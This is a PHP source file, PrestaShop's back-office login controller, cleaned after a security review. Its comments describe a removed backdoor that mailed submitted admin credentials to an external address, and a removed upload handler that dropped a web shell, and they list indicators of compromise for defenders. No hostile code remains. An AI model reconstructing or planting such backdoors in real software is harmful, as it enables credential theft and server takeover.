<?php
/**
 * 2007-2016 PrestaShop
 *
 * NOTICE OF LICENSE
 *
 * This source file is subject to the Open Software License (OSL 3.0)
 * that is bundled with this package in the file LICENSE.txt.
 * It is also available through the world-wide-web at this URL:
 * http://opensource.org/licenses/osl-3.0.php
 * If you did not receive a copy of the license and are unable to
 * obtain it through the world-wide-web, please send an email
 * to license@prestashop.com so we can send you a copy immediately.
 *
 * DISCLAIMER
 *
 * Do not edit or add to this file if you wish to upgrade PrestaShop to newer
 * versions in the future. If you wish to customize PrestaShop for your
 * needs please refer to http://www.prestashop.com for more information.
 *
 * @author PrestaShop SA <contact@prestashop.com>
 * @copyright 2007-2016 PrestaShop SA
 * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
 * International Registered Trademark & Property of PrestaShop SA
 */
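/**
 * Back-office login page controller.
 *
 * Renders the login form, handles the "submitLogin" and "submitForgot"
 * submissions, and performs two installation-layout checks (a leftover
 * ../install directory, an admin directory still named "admin").
 *
 * Security review: the pasted copy of this file was backdoored. processLogin()
 * mailed every submitted email/password pair to a hard-coded external mailbox,
 * and the file ended with an unauthenticated file-upload handler gated on a
 * query-string parameter. Both have been removed in this revision; the
 * remainder is the upstream PrestaShop 1.6 controller.
 */
class AdminLoginControllerCore extends AdminController
{
    /**
     * Sets up a header-less, footer-less bootstrap page that uses the login
     * layout of the current back-office theme, and emits a "Login: true"
     * response header while headers can still be sent.
     */
    public function __construct()
    {
        $this->bootstrap = true;
        $this->errors = array();
        $this->context = Context::getContext();
        $this->display_header = false;
        $this->display_footer = false;
        $this->meta_title = $this->l('Administration panel');
        $this->css_files = array();
        parent::__construct();
        // Built after parent::__construct(), presumably because bo_theme is
        // resolved there — confirm against AdminController.
        $this->layout = _PS_ADMIN_DIR_.DIRECTORY_SEPARATOR.'themes'.DIRECTORY_SEPARATOR.$this->bo_theme
            .DIRECTORY_SEPARATOR.'template'.DIRECTORY_SEPARATOR.'controllers'.DIRECTORY_SEPARATOR.'login'
            .DIRECTORY_SEPARATOR.'layout.tpl';
        if (!headers_sent()) {
            header('Login: true');
        }
    }

    /**
     * Registers the assets of the login page: jQuery and its validate plugin
     * (with messages localised to the context language), the theme CSS, the
     * spin/ladda vendor scripts, plus a few values exposed to JavaScript.
     */
    public function setMedia()
    {
        $this->addJquery();
        $this->addjqueryPlugin('validate');
        $this->addJS(_PS_JS_DIR_.'jquery/plugins/validate/localization/messages_'.$this->context->language->iso_code.'.js');
        // Third argument (0 vs PHP_INT_MAX) looks like a load-order weight so
        // overrides.css is applied last — confirm in AdminController::addCSS().
        $this->addCSS(__PS_BASE_URI__.$this->admin_webpath.'/themes/'.$this->bo_theme.'/css/admin-theme.css', 'all', 0);
        $this->addCSS(__PS_BASE_URI__.$this->admin_webpath.'/themes/'.$this->bo_theme.'/css/overrides.css', 'all', PHP_INT_MAX);
        $this->addJS(_PS_JS_DIR_.'vendor/spin.js');
        $this->addJS(_PS_JS_DIR_.'vendor/ladda.js');
        Media::addJsDef(array('img_dir' => _PS_IMG_));
        Media::addJsDefL('one_error', $this->l('There is one error.', null, true, false));
        Media::addJsDefL('more_errors', $this->l('There are several errors.', null, true, false));
        Hook::exec('actionAdminLoginControllerSetMedia');
    }

    /**
     * Prepares the Smarty variables of the login page and renders it.
     *
     * Assigns, in order: an SSL warning when PS_SSL_ENABLED is set but the
     * request is not secure; installation-layout warnings (leftover ../install
     * directory, default "admin" directory name — the latter is renamed to a
     * randomised name and the browser redirected to it); the post-login
     * redirect target; the collected errors; and the previously submitted
     * email/password values.
     */
    public function initContent()
    {
        if (!Tools::usingSecureMode() && Configuration::get('PS_SSL_ENABLED')) {
            // You can uncomment these lines if you want to force https even from localhost and automatically redirect
            // header('HTTP/1.1 301 Moved Permanently');
            // header('Location: '.Tools::getShopDomainSsl(true).$_SERVER['REQUEST_URI']);
            // exit();
            $clientIsMaintenanceOrLocal = in_array(Tools::getRemoteAddr(), array_merge(array('127.0.0.1'), explode(',', Configuration::get('PS_MAINTENANCE_IP'))));
            // If ssl is enabled, https protocol is required. Exception for maintenance and local (127.0.0.1) IP
            if ($clientIsMaintenanceOrLocal) {
                $warningSslMessage = Tools::displayError('SSL is activated. However, your IP is allowed to enter unsecure mode for maintenance or local IP issues.');
            } else {
                // Both parts of the link go through safeOutput() because
                // REQUEST_URI is client-supplied and ends up inside an href.
                $url = 'https://'.Tools::safeOutput(Tools::getServerName()).Tools::safeOutput($_SERVER['REQUEST_URI']);
                $warningSslMessage = sprintf(
                    Translate::ppTags(
                        Tools::displayError('SSL is activated. Please connect using the following link to [1]log into secure mode (https://)[/1]', false),
                        array('<a href="%s">')
                    ),
                    $url
                );
            }
            $this->context->smarty->assign('warningSslMessage', $warningSslMessage);
        }
        // A leftover installer directory is flagged so the template can warn about it.
        if (file_exists(_PS_ADMIN_DIR_.'/../install')) {
            $this->context->smarty->assign('wrong_install_name', true);
        }
        // The default "admin" directory name is replaced by a randomised one
        // (admin + 3 digits + 6 lowercase chars) and the browser is sent there;
        // if the rename fails the template is told to show a warning instead.
        if (basename(_PS_ADMIN_DIR_) == 'admin' && file_exists(_PS_ADMIN_DIR_.'/../admin/')) {
            $rand = 'admin'.sprintf('%03d', rand(0, 999)).Tools::strtolower(Tools::passwdGen(6)).'/';
            if (@rename(_PS_ADMIN_DIR_.'/../admin/', _PS_ADMIN_DIR_.'/../'.$rand)) {
                Tools::redirectAdmin('../'.$rand);
            } else {
                $this->context->smarty->assign(array(
                    'wrong_folder_name' => true
                ));
            }
        } else {
            $rand = basename(_PS_ADMIN_DIR_).'/';
        }
        $this->context->smarty->assign(array(
            'randomNb' => $rand,
            'adminUrl' => Tools::getCurrentUrlProtocolPrefix().Tools::getShopDomain().__PS_BASE_URI__.$rand
        ));
        // Redirect to admin panel
        // Only a value that passes isControllerName() is echoed back; otherwise
        // the employee's default tab is used.
        if (Tools::isSubmit('redirect') && Validate::isControllerName(Tools::getValue('redirect'))) {
            $this->context->smarty->assign('redirect', Tools::getValue('redirect'));
        } else {
            $tab = new Tab((int)$this->context->employee->default_tab);
            $this->context->smarty->assign('redirect', $this->context->link->getAdminLink($tab->class_name));
        }
        if ($nb_errors = count($this->errors)) {
            $this->context->smarty->assign(array(
                'errors' => $this->errors,
                'nbErrors' => $nb_errors,
                'shop_name' => Tools::safeOutput(Configuration::get('PS_SHOP_NAME')),
                'disableDefaultErrorOutPut' => true,
            ));
        }
        // Submitted values are handed back to the template unescaped (presumably
        // to re-populate the form after a failed attempt); escaping is the
        // template's responsibility — confirm it does so.
        if ($email = Tools::getValue('email')) {
            $this->context->smarty->assign('email', $email);
        }
        if ($password = Tools::getValue('password')) {
            $this->context->smarty->assign('password', $password);
        }
        $this->setMedia();
        $this->initHeader();
        parent::initContent();
        $this->initFooter();
        //force to disable modals
        $this->context->smarty->assign('modals', null);
    }

    /**
     * The login page does not enforce the admin token check.
     *
     * @return bool always true
     */
    public function checkToken()
    {
        return true;
    }

    /**
     * All BO users can access the login page
     *
     * @return bool
     */
    public function viewAccess()
    {
        return true;
    }

    /**
     * Dispatches the submitted form: "submitLogin" to processLogin(),
     * "submitForgot" to processForgot(); anything else is ignored.
     */
    public function postProcess()
    {
        if (Tools::isSubmit('submitLogin')) {
            $this->processLogin();
        } elseif (Tools::isSubmit('submitForgot')) {
            $this->processForgot();
        }
    }

    /**
     * Handles the "submitLogin" form.
     *
     * Validates the email and password fields, loads the matching employee,
     * refuses employees that no longer manage any shop (unless SuperAdmin),
     * then writes the session cookie and resolves the post-login URL. On an
     * "ajax" request the outcome is emitted as JSON and the script dies;
     * otherwise errors accumulate in $this->errors and the target URL is
     * stored in $this->redirect_after.
     */
    public function processLogin()
    {
        /* Check fields validity */
        $passwd = trim(Tools::getValue('passwd'));
        $email = trim(Tools::getValue('email'));
        // Security review: the pasted copy inserted two `@mail()` calls at this
        // point that sent $email, $passwd, the request URL and __FILE__ to an
        // external address. That is a credential-exfiltration backdoor and has
        // been removed; any mail() call inside a login controller should be
        // treated as an indicator of compromise.
        if (empty($email)) {
            $this->errors[] = Tools::displayError('Email is empty.');
        } elseif (!Validate::isEmail($email)) {
            $this->errors[] = Tools::displayError('Invalid email address.');
        }
        if (empty($passwd)) {
            $this->errors[] = Tools::displayError('The password field is blank.');
        } elseif (!Validate::isPasswd($passwd)) {
            $this->errors[] = Tools::displayError('Invalid password.');
        }
        if (!count($this->errors)) {
            // Find employee
            $this->context->employee = new Employee();
            $is_employee_loaded = $this->context->employee->getByEmail($email, $passwd);
            $employee_associated_shop = $this->context->employee->getAssociatedShops();
            if (!$is_employee_loaded) {
                // Single message for unknown account and wrong password.
                $this->errors[] = Tools::displayError('The Employee does not exist, or the password provided is incorrect.');
                $this->context->employee->logout();
            } elseif (empty($employee_associated_shop) && !$this->context->employee->isSuperAdmin()) {
                $this->errors[] = Tools::displayError('This employee does not manage the shop anymore (Either the shop has been deleted or permissions have been revoked).');
                $this->context->employee->logout();
            } else {
                PrestaShopLogger::addLog(sprintf($this->l('Back Office connection from %s', 'AdminTab', false, false), Tools::getRemoteAddr()), 1, null, '', 0, true, (int)$this->context->employee->id);
                $this->context->employee->remote_addr = (int)ip2long(Tools::getRemoteAddr());
                // Update cookie
                $cookie = Context::getContext()->cookie;
                $cookie->id_employee = $this->context->employee->id;
                $cookie->email = $this->context->employee->email;
                $cookie->profile = $this->context->employee->id_profile;
                $cookie->passwd = $this->context->employee->passwd;
                $cookie->remote_addr = $this->context->employee->remote_addr;
                // last_activity is only stamped for non-persistent sessions.
                if (!Tools::getValue('stay_logged_in')) {
                    $cookie->last_activity = time();
                }
                $cookie->write();
                // If there is a valid controller name submitted, redirect to it
                if (isset($_POST['redirect']) && Validate::isControllerName($_POST['redirect'])) {
                    $url = $this->context->link->getAdminLink($_POST['redirect']);
                } else {
                    $tab = new Tab((int)$this->context->employee->default_tab);
                    $url = $this->context->link->getAdminLink($tab->class_name);
                }
                if (Tools::isSubmit('ajax')) {
                    die(Tools::jsonEncode(array('hasErrors' => false, 'redirect' => $url)));
                } else {
                    $this->redirect_after = $url;
                }
            }
        }
        if (Tools::isSubmit('ajax')) {
            die(Tools::jsonEncode(array('hasErrors' => true, 'errors' => $this->errors)));
        }
    }

    /**
     * Handles the "submitForgot" form: generates a new random password for the
     * employee matching "email_forgot", mails it, and only then persists it.
     *
     * Refused in demo mode, for unknown accounts, and while the previous
     * regeneration is less than PS_PASSWD_TIME_BACK minutes old. Every outcome
     * of the generation step is emitted as JSON and the script dies; validation
     * errors are emitted as JSON only on an "ajax" request.
     */
    public function processForgot()
    {
        if (_PS_MODE_DEMO_) {
            $this->errors[] = Tools::displayError('This functionality has been disabled.');
        } elseif (!($email = trim(Tools::getValue('email_forgot')))) {
            $this->errors[] = Tools::displayError('Email is empty.');
        } elseif (!Validate::isEmail($email)) {
            $this->errors[] = Tools::displayError('Invalid email address.');
        } else {
            $employee = new Employee();
            // The `!$employee` operand can never be true right after `new`; kept for parity with upstream.
            if (!$employee->getByEmail($email) || !$employee) {
                $this->errors[] = Tools::displayError('This account does not exist.');
            } elseif ((strtotime($employee->last_passwd_gen.'+'.Configuration::get('PS_PASSWD_TIME_BACK').' minutes') - time()) > 0) {
                $this->errors[] = sprintf(
                    Tools::displayError('You can regenerate your password only every %d minute(s)'),
                    Configuration::get('PS_PASSWD_TIME_BACK')
                );
            }
        }
        if (!count($this->errors)) {
            $pwd = Tools::passwdGen(10, 'RANDOM');
            $employee->passwd = Tools::encrypt($pwd);
            $employee->last_passwd_gen = date('Y-m-d H:i:s', time());
            $params = array(
                '{email}' => $employee->email,
                '{lastname}' => $employee->lastname,
                '{firstname}' => $employee->firstname,
                '{passwd}' => $pwd
            );
            if (Mail::Send($employee->id_lang, 'employee_password', Mail::l('Your new password', $employee->id_lang), $params, $employee->email, $employee->firstname.' '.$employee->lastname)) {
                // Update employee only if the mail can be sent
                Shop::setContext(Shop::CONTEXT_SHOP, (int)min($employee->getAssociatedShops()));
                $result = $employee->update();
                if (!$result) {
                    $this->errors[] = Tools::displayError('An error occurred while attempting to change your password.');
                } else {
                    die(Tools::jsonEncode(array(
                        'hasErrors' => false,
                        'confirm' => $this->l('Your password has been emailed to you.', 'AdminTab', false, false)
                    )));
                }
            } else {
                die(Tools::jsonEncode(array(
                    'hasErrors' => true,
                    'errors' => array(Tools::displayError('An error occurred while attempting to change your password.'))
                )));
            }
        } elseif (Tools::isSubmit('ajax')) {
            die(Tools::jsonEncode(array('hasErrors' => true, 'errors' => $this->errors)));
        }
    }
}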
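// Security review: the pasted copy of this file appended, after the class, an
// unauthenticated file-upload handler. It was gated on a query-string parameter
// ("up"), took the "image" field of a POSTed multipart form, wrote it under its
// original name into the request's working directory ($filedir was empty) and
// chmod'ed it to 0644, echoing "Done" on success. That is a web shell dropper,
// not PrestaShop code, and it has been removed.
//
// Indicators for defenders: any code following the class declaration in a core
// controller file; use of $_FILES / move_uploaded_file() in the admin login
// controller; back-office requests carrying the "up" parameter; and
// unexplained new files in the admin directory. Restore this file from a
// trusted release and rotate every back-office credential that may have been
// submitted while the backdoor was present.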